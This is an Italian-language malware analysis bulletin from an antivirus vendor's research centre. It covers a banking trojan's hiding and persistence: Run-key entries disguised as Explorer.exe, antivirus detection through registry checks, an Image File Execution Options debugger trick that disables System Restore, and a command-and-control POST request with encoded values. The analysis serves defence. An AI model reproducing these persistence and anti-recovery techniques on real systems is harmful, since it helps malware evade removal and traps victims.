27/09/2013 12:46:11 - Trojan.Win32.Banker.XD utilizza tecniche stealth per eludere la sua presenza.

Da alcune settimane si sta diffondendo una nuova variante di banker che utilizza tecniche stealth per nascondersi.
Questa nuova variante di banker, classificato come Trojan.Win32.Banker.XD, nasconde la sua presenza a livello di registro in modo da eseguirsi automaticamente all'avvio di Windows e disabilita il ripristino di configurazione di sistema.
Il sample analizzato dal C.R.A.M. (Centro Ricerca Anti-Malware) è stato identificato con il nome di Trojan.Win32.banker.XD,
Proprietà del file:
MD5: DFFAFE13BE9FEA16EB79E4EF1A3E0E13
Dimensione: 96608 byte
Nome: [nome casuale].exe
Lingua: Cinese (Hong Kong - R.A.S.)
Nome file originale: Bloemfon.exe
Prodotto: Forepoint seroderm
Società: CamStudio Open Source Dev Team
Quando viene eseguito il file infetto da Trojan.Win32.Banker.XD, questo crea una cartella nascosta con attributi di sistema:
C:\Programmi\Common Files\h65guhb0
All'interno della cartella vengono creati due files:
-
dttezfca.exe (una copia di se stesso con attributi: nascosto e di sola lettura)
-
00177fae.txt ( viene eliminato subito dopo la sua creazione, nessun dato viene scritto al suo interno)
Operazioni eseguite su registro di sistema:
Crea la chiave
HKCU\Software\WinZip\Uuid
Legge il valore della chiave
HKLM\SOFTWARE\Microsoft NT\CurrentVersion\ProductId
Controlla la presenza di eventuali software AntiVirus sul computer, interpellando in sequenza le seguenti chiavi di registro:
-
HKLM\SOFTWARE\Symantec
-
HKLM\SOFTWARE\Avira
-
HKLM\SOFTWARE\ESET
-
HKLM\SOFTWARE\ArcaBit
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG_UI
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVP
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bdagent
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trendo Micro Titanium
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avast
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSC
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BullGuard
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sophos AutoUpdate Monitor
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SplDerAgent
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\APVXDWIN
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\emisisoft anti-malware
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ISTray
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\G Data AntiVirus Tray Application
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\G Data AntiVirus Tray
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ZoneAlarm
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bkav
-
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\V3 Application
Legge il valore di:
Il Trojan.Win32.Banker.XD, per eseguirsi automaticamente all'avvio, aggiunge le seguenti chiavi di registro:
In realtà la stringa j8hjfuin che punta a \Windows\Explorer.exe non avvia il consueto Explorer.exe di Windows ma esegue, invece, Il Trojan,Win32.Banker.XD da questa posizione C:\Programmi\Common Files\h65guhb0\dttezftca.exe
Quando viene richiesta la lettura (a livello user mode) della chiave registro del Trojan.Win32.Banker.XD, questo restituirà il percorso del file "\Windows\Explorer.exe" invece del file infetto del Trojan.Win32.Banker.XD.
Inoltre va a disabilitare il Ripristino di sistema di Windows, bloccando l'esecuzione del file di Windows rstrui.exe.
Per far ciò, il Trojan.Win32.Banker.XD, aggiunge la seguente chiave di registro:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\IamgeFileExecutionOptions\rstrui.exe
[Debugger] = <nome casuale>_.exe
Con questo tipo di modifica, qualsiasi programma avviato, con nome rstrui.exe , verrà eseguito dal debugger indicato nella chiave di registro.
Se il file di debugger specificato non è presente, comporterà l'errore dell'esecuzione del programma richiesto.
In questo caso il Trojan.Win32.Banker.XD, specifica come debugger un file .EXE con nome casuale, che cambia ad ogni avvio del computer, ecco alcuni esempi:
-
txklyboa_.exe
-
lgzo_.exe
-
t_.exe
-
[nome casuale]_.exe
Il file indicato come debugger non è presente nel computer.
Con questo approccio l'utente non potrà mai utilizzare l'utility di ripristino di Windows.
Con quest'ultima modifica il banker si assicura una costante presenza sul PC compromesso impedendo il ripristino del sistema operativo in un punto precedente all'infezione.
Il Trojan.Win32.Banker.XD si collega al sito http://www.romeoxx.xx (217.23.xxx.xxx) sulla porta 80, inviando la seguente richiesta:
POST /batman/ice/order.php HTTP/1.1 caricando cinque distinti valori:
ps0=
|
0000000000000000000000000000000000000
0000000000000000000000000000000000000
|
ps1=
|
855BB5FD28AB63A326466800ED74AC5FF9325F43F
1603E957DDE6640906CE811A735A243F4298FB91C
318F08FE4BB334C9812265B2340B2523B8C4D8025
D83892682B9FB18DB30D13FE27056E28168B9C275
316FCDEC85C7AF67B7F3A11AA6A5E0C82B0789F86
4E54B89795E49766EC12507B950DB45F59BEE71E7
72DE464BB1899CEC44DA1614CD5D0BBC0098D32
15AB2E449F2
|
cs1=
|
5ECC83EA41CCE9EA6FCCD6EA7ACCCBEA7CCCD4E
A70CCD0EA41CCFAEA72CCD4EA70CCD6EA73CC99
EA5BCCD0EA71CCDCEA6ECCE5EA75CC8FEA28CCD
EEA68CCD1EA7FCC89EA41CCCFEA7BCCCEEA75CC
D1EA64CCDDEA71CCCBEA33CCDCEA65CCDCEA
|
cs2=
|
74CCDCEA65CCC9EA71CCD6EA6FCCDCEA33CCD
CEA65CCDCEA
|
cs3=
|
5ECCEBEA5CCCF4EA45CCE9EA2ACC8CEA2BCC8F
EA28CC8AEA41CCFAEA4FCCF8EA50CC
|
Geolocazione del sito http://www.romeoxx.xx (217.23.xxx.xxx)

Il Trojan.Win32.Banker.XD viene intercettato e rimosso da Vir.IT eXplorer versione 7.5.1.
---------------------------------
CRAM (Centro Ricerche Anti-Malware) di TG Soft
Utilizzabilità delle informative e delle immagine in esse contenute
Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook a patto che venga sempre e comunque citata la fonte "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini. Inoltre per ogni immagine utilizzata dovrà essere sempre indicata la fonte ed il link cliccabile alla pagina originale dell'informativa di prima pubblicazione. Per quanto riguarda le pubblicazioni cartacee sarà necessario citare la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" ed in analogia alle pubblicata elettroniche i link sotto ad ogni immagine alla pagina web originale da cui sono state estratte.
Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito
"Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]"
|